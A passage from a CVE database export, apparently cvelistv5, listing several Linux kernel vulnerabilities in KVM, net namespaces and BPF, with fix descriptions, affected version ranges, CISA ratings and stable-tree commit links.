"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: vgic-v2: Check for non-NULL vCPU in vgic_v2_parse_attr()\n\nvgic_v2_parse_attr() is responsible for finding the vCPU that matches\nthe user-provided CPUID, which (of course) may not be valid. If the ID\nis invalid, kvm_get_vcpu_by_id() returns NULL, which isn\u0027t handled\ngracefully.\n\nSimilar to the GICv3 uaccess flow, check that kvm_get_vcpu_by_id()\nactually returns something and fail the ioctl if not."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:43.875Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4404465a1bee3607ad90a4c5f9e16dfd75b85728"
},
{
"url": "https://git.kernel.org/stable/c/17db92da8be5dd3bf63c01f4109fe47db64fc66f"
},
{
"url": "https://git.kernel.org/stable/c/3a5b0378ac6776c7c31b18e0f3c1389bd6005e80"
},
{
"url": "https://git.kernel.org/stable/c/8d6a1c8e3de36cb0f5e866f1a582b00939e23104"
},
{
"url": "https://git.kernel.org/stable/c/01981276d64e542c177b243f7c979fee855d5487"
},
{
"url": "https://git.kernel.org/stable/c/6ddb4f372fc63210034b903d96ebbeb3c7195adb"
}
],
"title": "KVM: arm64: vgic-v2: Check for non-NULL vCPU in vgic_v2_parse_attr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36953",
"datePublished": "2024-05-30T15:35:48.070Z",
"dateReserved": "2024-05-30T15:25:07.080Z",
"dateUpdated": "2025-05-04T09:12:43.875Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36883 (GCVE-0-2024-36883)
Vulnerability from cvelistv5
Published
2024-05-30 15:28
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: fix out-of-bounds access in ops_init
net_alloc_generic is called by net_alloc, which is called without any
locking. It reads max_gen_ptrs, which is changed under pernet_ops_rwsem. It
is read twice, first to allocate an array, then to set s.len, which is
later used to limit the bounds of the array access.
It is possible that the array is allocated and another thread is
registering a new pernet ops, increments max_gen_ptrs, which is then used
to set s.len with a larger than allocated length for the variable array.
Fix it by reading max_gen_ptrs only once in net_alloc_generic. If
max_gen_ptrs is later incremented, it will be caught in net_assign_generic.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 073862ba5d249c20bd5c49fc6d904ff0e1f6a672 Version: 561331eae0a03d0c4cf60f3cf485aa3e8aa5ab48 Version: a2c82f7bee1ffa9eafa1fb0bd886a7eea8c9e497 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36883",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T19:28:57.397023Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T19:29:08.414Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-10-18T13:07:38.120Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cdc34d76c4f777579e28ad373979d36c030cfd3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7b0e64583eab8c1d896b47e5dd0bf2e7d86ec41f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c3248bc708a7797be573214065cf908ff1f54c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9518b79bfd2fbf99fa9b7e8e36bcb1825e7ba030"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2d60ff5874aefd006717ca5e22ac1e25eac29c42"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6dbfd5bcc267a95a0bf1bf96af46243f96ec6cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4f94587e1bf87cb40ec33955a9d90148dd026ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a26ff37e624d12e28077e5b24d2b264f62764ad6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241018-0001/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/net_namespace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3cdc34d76c4f777579e28ad373979d36c030cfd3",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "7b0e64583eab8c1d896b47e5dd0bf2e7d86ec41f",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "0c3248bc708a7797be573214065cf908ff1f54c7",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "9518b79bfd2fbf99fa9b7e8e36bcb1825e7ba030",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "2d60ff5874aefd006717ca5e22ac1e25eac29c42",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "b6dbfd5bcc267a95a0bf1bf96af46243f96ec6cd",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "f4f94587e1bf87cb40ec33955a9d90148dd026ab",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"lessThan": "a26ff37e624d12e28077e5b24d2b264f62764ad6",
"status": "affected",
"version": "073862ba5d249c20bd5c49fc6d904ff0e1f6a672",
"versionType": "git"
},
{
"status": "affected",
"version": "561331eae0a03d0c4cf60f3cf485aa3e8aa5ab48",
"versionType": "git"
},
{
"status": "affected",
"version": "a2c82f7bee1ffa9eafa1fb0bd886a7eea8c9e497",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/net_namespace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.0.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.2.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: fix out-of-bounds access in ops_init\n\nnet_alloc_generic is called by net_alloc, which is called without any\nlocking. It reads max_gen_ptrs, which is changed under pernet_ops_rwsem. It\nis read twice, first to allocate an array, then to set s.len, which is\nlater used to limit the bounds of the array access.\n\nIt is possible that the array is allocated and another thread is\nregistering a new pernet ops, increments max_gen_ptrs, which is then used\nto set s.len with a larger than allocated length for the variable array.\n\nFix it by reading max_gen_ptrs only once in net_alloc_generic. If\nmax_gen_ptrs is later incremented, it will be caught in net_assign_generic."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:24.544Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3cdc34d76c4f777579e28ad373979d36c030cfd3"
},
{
"url": "https://git.kernel.org/stable/c/7b0e64583eab8c1d896b47e5dd0bf2e7d86ec41f"
},
{
"url": "https://git.kernel.org/stable/c/0c3248bc708a7797be573214065cf908ff1f54c7"
},
{
"url": "https://git.kernel.org/stable/c/9518b79bfd2fbf99fa9b7e8e36bcb1825e7ba030"
},
{
"url": "https://git.kernel.org/stable/c/2d60ff5874aefd006717ca5e22ac1e25eac29c42"
},
{
"url": "https://git.kernel.org/stable/c/b6dbfd5bcc267a95a0bf1bf96af46243f96ec6cd"
},
{
"url": "https://git.kernel.org/stable/c/f4f94587e1bf87cb40ec33955a9d90148dd026ab"
},
{
"url": "https://git.kernel.org/stable/c/a26ff37e624d12e28077e5b24d2b264f62764ad6"
}
],
"title": "net: fix out-of-bounds access in ops_init",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36883",
"datePublished": "2024-05-30T15:28:53.302Z",
"dateReserved": "2024-05-30T15:25:07.064Z",
"dateUpdated": "2025-05-04T12:56:24.544Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26885 (GCVE-0-2024-26885)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix DEVMAP_HASH overflow check on 32-bit arches
The devmap code allocates a number hash buckets equal to the next power
of two of the max_entries value provided when creating the map. When
rounding up to the next power of two, the 32-bit variable storing the
number of buckets can overflow, and the code checks for overflow by
checking if the truncated 32-bit value is equal to 0. However, on 32-bit
arches the rounding up itself can overflow mid-way through, because it
ends up doing a left-shift of 32 bits on an unsigned long value. If the
size of an unsigned long is four bytes, this is undefined behaviour, so
there is no guarantee that we'll end up with a nice and tidy 0-value at
the end.
Syzbot managed to turn this into a crash on arm32 by creating a
DEVMAP_HASH with max_entries > 0x80000000 and then trying to update it.
Fix this by moving the overflow check to before the rounding up
operation.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 Version: 6f9d451ab1a33728adb72d7ff66a7b374d665176 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.4:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"status": "affected",
"version": "6f9d451ab1a3"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26885",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:51:32.926370Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:30.477Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.424Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/225da02acdc97af01b6bc6ce1a3e5362bf01d3fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c826502bed93970f2fd488918a7b8d5f1d30e2e3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edf7990baa48de5097daa9ac02e06cb4c798a737"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/250051acc21f9d4c5c595e4fcb55986ea08c4691"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22079b3a423382335f47d9ed32114e6c9fe88d7c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e89386f62ce9a9ab9a94835a9890883c23d9d52c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/281d464a34f540de166cee74b723e97ac2515ec3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/devmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1f5e352b9088211fa5eb4e1639cd365f4f7d2f65",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "4b81a9f92b3676cb74b907a7a209b3d15bd9a7f9",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "c826502bed93970f2fd488918a7b8d5f1d30e2e3",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "edf7990baa48de5097daa9ac02e06cb4c798a737",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "250051acc21f9d4c5c595e4fcb55986ea08c4691",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "22079b3a423382335f47d9ed32114e6c9fe88d7c",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "e89386f62ce9a9ab9a94835a9890883c23d9d52c",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
},
{
"lessThan": "281d464a34f540de166cee74b723e97ac2515ec3",
"status": "affected",
"version": "6f9d451ab1a33728adb72d7ff66a7b374d665176",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/devmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.227",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.227",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix DEVMAP_HASH overflow check on 32-bit arches\n\nThe devmap code allocates a number hash buckets equal to the next power\nof two of the max_entries value provided when creating the map. When\nrounding up to the next power of two, the 32-bit variable storing the\nnumber of buckets can overflow, and the code checks for overflow by\nchecking if the truncated 32-bit value is equal to 0. However, on 32-bit\narches the rounding up itself can overflow mid-way through, because it\nends up doing a left-shift of 32 bits on an unsigned long value. If the\nsize of an unsigned long is four bytes, this is undefined behaviour, so\nthere is no guarantee that we\u0027ll end up with a nice and tidy 0-value at\nthe end.\n\nSyzbot managed to turn this into a crash on arm32 by creating a\nDEVMAP_HASH with max_entries \u003e 0x80000000 and then trying to update it.\nFix this by moving the overflow check to before the rounding up\noperation."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:51.351Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1f5e352b9088211fa5eb4e1639cd365f4f7d2f65"
},
{
"url": "https://git.kernel.org/stable/c/4b81a9f92b3676cb74b907a7a209b3d15bd9a7f9"
},
{
"url": "https://git.kernel.org/stable/c/c826502bed93970f2fd488918a7b8d5f1d30e2e3"
},
{
"url": "https://git.kernel.org/stable/c/edf7990baa48de5097daa9ac02e06cb4c798a737"
},
{
"url": "https://git.kernel.org/stable/c/250051acc21f9d4c5c595e4fcb55986ea08c4691"
},
{
"url": "https://git.kernel.org/stable/c/22079b3a423382335f47d9ed32114e6c9fe88d7c"
},
{
"url": "https://git.kernel.org/stable/c/e89386f62ce9a9ab9a94835a9890883c23d9d52c"
},
{
"url": "https://git.kernel.org/stable/c/281d464a34f540de166cee74b723e97ac2515ec3"
}
],
"title": "bpf: Fix DEVMAP_HASH overflow check on 32-bit arches",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26885",
"datePublished": "2024-04-17T10:27:40.300Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:51.351Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52462 (GCVE-0-2023-52462)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: fix check for attempt to corrupt spilled pointer
When register is spilled onto a stack as a 1/2/4-byte register, we set
slot_type[BPF_REG_SIZE - 1] (plus potentially few more below it,
depending on actual spill size). So to check if some stack slot has
spilled register we need to consult slot_type[7], not slot_type[0].
To avoid the need to remember and double-check this in the future, just
use is_spilled_reg() helper.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cdd73a5ed0840da88a3b9ad353f568e6f156d417 Version: 07c286c10a9cedbd71f20269ff3a4e73d9aab2fe Version: 27113c59b6d0a587b29ae72d4ff3f832f58b0651 Version: 27113c59b6d0a587b29ae72d4ff3f832f58b0651 Version: 27113c59b6d0a587b29ae72d4ff3f832f58b0651 Version: 27113c59b6d0a587b29ae72d4ff3f832f58b0651 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52462",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-25T18:04:18.745118Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T15:20:26.904Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.753Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2757f17972d87773b3677777f5682510f13c66ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67e6707f07354ed1acb4e65552e97c60cf9d69cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fc3e3c50a0a4cac1463967c110686189e4a59104"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8dc15b0670594543c356567a1a45b0182ec63174"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40617d45ea05535105e202a8a819e388a2b1f036"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab125ed3ec1c10ccc36bc98c7a4256ad114a3dae"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/verifier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2757f17972d87773b3677777f5682510f13c66ef",
"status": "affected",
"version": "cdd73a5ed0840da88a3b9ad353f568e6f156d417",
"versionType": "git"
},
{
"lessThan": "67e6707f07354ed1acb4e65552e97c60cf9d69cf",
"status": "affected",
"version": "07c286c10a9cedbd71f20269ff3a4e73d9aab2fe",
"versionType": "git"
},
{
"lessThan": "fc3e3c50a0a4cac1463967c110686189e4a59104",
"status": "affected",
"version": "27113c59b6d0a587b29ae72d4ff3f832f58b0651",
"versionType": "git"
},
{
"lessThan": "8dc15b0670594543c356567a1a45b0182ec63174",
"status": "affected",
"version": "27113c59b6d0a587b29ae72d4ff3f832f58b0651",
"versionType": "git"
},
{
"lessThan": "40617d45ea05535105e202a8a819e388a2b1f036",
"status": "affected",
"version": "27113c59b6d0a587b29ae72d4ff3f832f58b0651",
"versionType": "git"
},
{
"lessThan": "ab125ed3ec1c10ccc36bc98c7a4256ad114a3dae",
"status": "affected",
"version": "27113c59b6d0a587b29ae72d4ff3f832f58b0651",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/verifier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
